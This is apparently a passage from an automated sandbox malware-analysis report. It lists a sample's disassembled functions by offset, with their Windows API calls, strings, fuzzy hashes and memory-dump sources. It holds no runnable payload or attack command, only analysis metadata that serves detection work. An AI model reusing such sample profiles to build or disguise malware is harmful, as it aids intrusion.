Opcode ID: 7844cdec247ac3d2d35134a6f1d3b53f218c9fb6cb13e3d504aae78faa3084e8
Instruction ID: 02e27a443d0c975bd2d35078e55c9ecbb47b75263e9a7029776e4410220f8425
Opcode Fuzzy Hash: 7844cdec247ac3d2d35134a6f1d3b53f218c9fb6cb13e3d504aae78faa3084e8
Instruction Fuzzy Hash: C821C3B67002029BC710EB94DEC595F73A8EB84368724463BF502F32D0DB78AC019B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403094

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 43e3c0ed55451ca58d66c179b0d5cd373ba627774d09ad719adf1b780fd88a5d
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: F0E08631101119BBCF105E61AC00A9B3F9CEB05362F00C032FA04E5190D538DA14DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B00 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
Instruction ID: 26822e9457f7499eaf47d686268157363fcd7c772d88ad4a089d565b944a1739
Opcode Fuzzy Hash: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
Instruction Fuzzy Hash: 4DE08CB6240108BFDB50EFA5ED4BFD677ECBB04340F008921B618EB091CA75E5809B68

Uniqueness

Uniqueness Score: -1.00%

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 25ac80cc8f42eb6b6973bcf28b0dcf98930a4937f6a650695082248e1846420d
Instruction ID: fb11a27b057d952daa1a0232a569a569c421c01e2099f6af0567112f3631a007
Opcode Fuzzy Hash: 25ac80cc8f42eb6b6973bcf28b0dcf98930a4937f6a650695082248e1846420d
Instruction Fuzzy Hash: 60D01273B08211D7DB50EFA59E4859D7664AB503A8B204637E512F11D0D2B98541A619

Uniqueness

Uniqueness Score: -1.00%

Function 004030AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 004030BD

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040347B Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF), ref: 00403486

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
Instruction ID: dd629d7ffa80b2531d7668e5a1a305395e4adc4893f6b58610a8e469f8d50dee
Opcode Fuzzy Hash: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
Instruction Fuzzy Hash: F8C01230504600E6D2246F759E0A6093A18574173AB904336B179B50F1C77C5901453E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404EE8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00404F47
GetDlgItem.USER32(?,000003EE), ref: 00404F56
GetClientRect.USER32 ref: 00404F93
GetSystemMetrics.USER32 ref: 00404F9B
SendMessageA.USER32 ref: 00404FBC
SendMessageA.USER32 ref: 00404FCD
SendMessageA.USER32 ref: 00404FE0
SendMessageA.USER32 ref: 00404FEE
SendMessageA.USER32 ref: 00405001
ShowWindow.USER32(00000000,?), ref: 00405023
ShowWindow.USER32(?,00000008), ref: 00405037
GetDlgItem.USER32(?,000003EC), ref: 00405058
SendMessageA.USER32 ref: 00405068
SendMessageA.USER32 ref: 00405081
SendMessageA.USER32 ref: 0040508D
GetDlgItem.USER32(?,000003F8), ref: 00404F65

Part of subcall function 00403DF3: SendMessageA.USER32 ref: 00403E01

GetDlgItem.USER32(?,000003EC), ref: 004050AA
CreateThread.KERNEL32(00000000,00000000,Function_00004E7C,00000000), ref: 004050B8
CloseHandle.KERNEL32(00000000), ref: 004050BF
ShowWindow.USER32(00000000), ref: 004050E3
ShowWindow.USER32(?,00000008), ref: 004050E8
ShowWindow.USER32(00000008), ref: 0040512F
SendMessageA.USER32 ref: 00405161
CreatePopupMenu.USER32 ref: 00405172
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405187
GetWindowRect.USER32(?,?), ref: 0040519A
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004051BE
SendMessageA.USER32 ref: 004051F9
OpenClipboard.USER32(00000000), ref: 00405209
EmptyClipboard.USER32 ref: 0040520F
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405218
GlobalLock.KERNEL32 ref: 00405222
SendMessageA.USER32 ref: 00405236
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040524E
SetClipboardData.USER32 ref: 00405259
CloseClipboard.USER32 ref: 0040525F

Strings

{, xrefs: 0040514E

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
Instruction ID: ecf959edf644124ae9a18d4fa2a520563b4821934e06b5e1f2851b0e4fc8d151
Opcode Fuzzy Hash: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
Instruction Fuzzy Hash: FBA14870900208BFEB219FA1DD89AAE7F79FB08355F40407AFA05AA2A0C7755E41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004046F9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404710
GetDlgItem.USER32(?,00000408), ref: 0040471D
GlobalAlloc.KERNEL32(00000040,?), ref: 00404769
LoadBitmapA.USER32 ref: 0040477C
SetWindowLongA.USER32(?,000000FC,00404CFA), ref: 00404796
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047AA
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047BE
SendMessageA.USER32 ref: 004047D3
SendMessageA.USER32 ref: 004047DF
SendMessageA.USER32 ref: 004047F1
DeleteObject.GDI32(?), ref: 004047F6
SendMessageA.USER32 ref: 00404821
SendMessageA.USER32 ref: 0040482D
SendMessageA.USER32 ref: 004048C2
SendMessageA.USER32 ref: 004048ED
SendMessageA.USER32 ref: 00404901
GetWindowLongA.USER32(?,000000F0), ref: 00404930
SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040493E
ShowWindow.USER32(?,00000005), ref: 0040494F
SendMessageA.USER32 ref: 00404A52
SendMessageA.USER32 ref: 00404AB7
SendMessageA.USER32 ref: 00404ACC
SendMessageA.USER32 ref: 00404AF0
SendMessageA.USER32 ref: 00404B16
ImageList_Destroy.COMCTL32(?), ref: 00404B2B
GlobalFree.KERNEL32(?), ref: 00404B3B
SendMessageA.USER32 ref: 00404BAB
SendMessageA.USER32 ref: 00404C54
SendMessageA.USER32 ref: 00404C63
InvalidateRect.USER32(?,00000000,00000001), ref: 00404C83
ShowWindow.USER32(?,00000000), ref: 00404CD1
GetDlgItem.USER32(?,000003FE), ref: 00404CDC
ShowWindow.USER32(00000000), ref: 00404CE3

Strings

, xrefs: 00404CBB
M, xrefs: 004048A9
N, xrefs: 0040498D

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
Instruction ID: 30a51c26aaa2b30bd696497e7e47c5adc9155ce2862f65cc436e234c57937e2f
Opcode Fuzzy Hash: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
Instruction Fuzzy Hash: D402AFB0A00208AFDB20DF55DD45AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004041FC Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 266stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404248
SetWindowTextA.USER32(?,?), ref: 00404275
SHBrowseForFolderA.SHELL32(?,004293B0,?), ref: 0040432A
CoTaskMemFree.OLE32(00000000), ref: 00404335
lstrcmpiA.KERNEL32(hjgjhad,00429FE0,00000000,?,?), ref: 00404367
lstrcatA.KERNEL32(?,hjgjhad), ref: 00404373
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404383

Part of subcall function 004052B1: GetDlgItemTextA.USER32 ref: 004052C4

Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8

GetDiskFreeSpaceA.KERNEL32(00428FA8,?,?,0000040F,?,00428FA8,00428FA8,?,00000000,00428FA8,?,?,000003FB,?), ref: 0040443C
MulDiv.KERNEL32 ref: 00404457
SetDlgItemTextA.USER32(00000000,00000400,00428F98), ref: 004044D0

Strings

hjgjhad, xrefs: 00404361, 00404366, 00404371
A, xrefs: 00404323

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$hjgjhad
API String ID: 2246997448-1285462269
Opcode ID: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
Instruction ID: 52dfe11e264a0fce323933678d720eed1997f61c196974170264a293bd140da1
Opcode Fuzzy Hash: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
Instruction Fuzzy Hash: 19915FB1A00219ABDF11AFA1CC85AAF7BB8EF84315F10407BFA00B6291D77C99418F59

Uniqueness

Uniqueness Score: -1.00%

Function 00405A2E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405AD6
GetSystemDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B51
GetWindowsDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B64
SHGetSpecialFolderLocation.SHELL32(?,0041DB88), ref: 00405BA0
SHGetPathFromIDListA.SHELL32(0041DB88,hjgjhad), ref: 00405BAE
CoTaskMemFree.OLE32(0041DB88), ref: 00405BB9
lstrcatA.KERNEL32(hjgjhad,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BDB
lstrlenA.KERNEL32(hjgjhad,?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405C2D

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B20
hjgjhad, xrefs: 00405A57, 00405B1E, 00405B3B, 00405B50, 00405B63, 00405B7F, 00405BAA, 00405BDA, 00405BE0, 00405BF8, 00405C0B, 00405C26, 00405C2C, 00405C37, 00405C61
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BD5

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hjgjhad
API String ID: 900638850-281039111
Opcode ID: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
Instruction ID: e3937826694aa96a66c9679703be47664347117baa65301e61951ea2719d1281
Opcode Fuzzy Hash: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
Instruction Fuzzy Hash: DB51F331A04B05AAEF219B689C84BBF3BB4DB15314F54423BE912B62D0D27C6D42DF4E

Uniqueness

Uniqueness Score: -1.00%

Function 00402020 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407490,?,00000001,00407480,?), ref: 00402073
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409378,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 004020AB

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-2935972921
Opcode ID: e2440bd97a0de28c640c01a9d5d42cc8b810f7137a49c2ac781f9d5420d32ae4
Instruction ID: ee874f8c2dec57c4877f78095a0f9dac743c80c93ea62094aeb2a8065092a27c
Opcode Fuzzy Hash: e2440bd97a0de28c640c01a9d5d42cc8b810f7137a49c2ac781f9d5420d32ae4
Instruction Fuzzy Hash: 07417D75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 91dde0ba118db7d7ebc8a8be9eaa396cb067559f4d74f26d235d81ef142ed7f1
Instruction ID: c4edc1118dc91e0c9440d01bfde8b8f2caf312925950fbc99ec99334c7621aa2
Opcode Fuzzy Hash: 91dde0ba118db7d7ebc8a8be9eaa396cb067559f4d74f26d235d81ef142ed7f1
Instruction Fuzzy Hash: E3F0E572648101DFD700EBB49D49AEEB768DF51328FA007BBF502F20C1C2B84945DB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00406128 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2605cf98d0f5e4d904242d25cd3a4b56aad5cd8bbaf3b06cd26a7c18d89d64d
Instruction ID: 671146196c1174ec618cbc22bbed2adbdbe1d7b4d249fb8fe9215707769dedfe
Opcode Fuzzy Hash: c2605cf98d0f5e4d904242d25cd3a4b56aad5cd8bbaf3b06cd26a7c18d89d64d
Instruction Fuzzy Hash: 3FE16971901B09DFDB24CF58C880BAABBF5EB44305F15852EE897A72D1D378AA51CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004068FF Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b751e5aff08849ce342a749075ab7f0bf0a9efd73ac853bc595c300a3c4f69bb
Instruction ID: ce73a9d55fc041a401e528a6b0bed7c2fc314d3430b7e91baefc2d4226deaab1
Opcode Fuzzy Hash: b751e5aff08849ce342a749075ab7f0bf0a9efd73ac853bc595c300a3c4f69bb
Instruction Fuzzy Hash: 51C13A71A002698BDF14CF68C4905EEB7B2FF99314F26827AD856B7380D7346952CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004038EB Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403927
ShowWindow.USER32(?), ref: 00403944
